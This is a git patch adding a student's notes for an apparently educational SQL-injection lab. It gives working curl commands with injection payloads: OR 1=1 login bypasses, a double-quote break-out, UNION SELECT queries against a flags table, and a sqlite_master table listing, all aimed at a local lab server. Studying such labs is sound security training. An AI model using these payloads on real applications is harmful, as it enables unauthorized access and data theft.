From 1d2e70a16fea861625664178dcaedd8559c624c2 Mon Sep 17 00:00:00 2001 From: Kaushik Narayan R Date: Sun, 1 Dec 2024 18:42:46 -0700 Subject: [PATCH] lab 5b - sql injections --- Dojo Notes.md | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) diff --git a/Dojo Notes.md b/Dojo Notes.md index b512c32..fed57a1 100644 --- a/Dojo Notes.md +++ b/Dojo Notes.md @@ -577,6 +577,36 @@ honestly idk just check class vid and script ### lab 5b.1 - sql pass to session +- unsanitized SQL query in flask app +- simple injection +- app sets session cookie for 'login', use that to curl again and app prints flag +- do injection to get cookie `curl -c cookies.txt 'http://lab.localhost?username="hi"+or+1=1+--&password=admin'` +- then use cookie `curl -b cookies.txt 'http://lab.localhost` + +### lab 5b.1 - sql pass to session ii + +- input escaped by double quote +- break it then do the same +- `curl -c cookies.txt 'http://lab.localhost?username="+or+1=1+--&password=admin'` +- i.e. a single " to break + +### lab 5b.3 - unionize + +- same double quote escape +- no added select query in app to get flag, we hv to inject a select query +- add a union clause and select from flags table +- when it tries to convert the rowid with int(), it will print the error as the 'rowid' here is the flag string that we selected, so it can't convert a string +- also a POST request +- `curl -X POST 'http://lab.localhost' -d 'username="union%20select%20*%20from%20flags%20--&password=admin` + +### lab 5b.4 - master union with 64 + +- flag is base64 encoded and used in a table's name +- but it's the same unionize vuln +- so let's get the table name from the sqlite master table - `SELECT name FROM sqlite_master WHERE type='table'` +- so: `curl 'http://lab.localhost/?query=test"union+select+name+from+sqlite_master+where+type="table"--'` +- then `base64 -d` + ## Project 04 - continued ### .16 - arg wars VI - return of the hacker - reattempt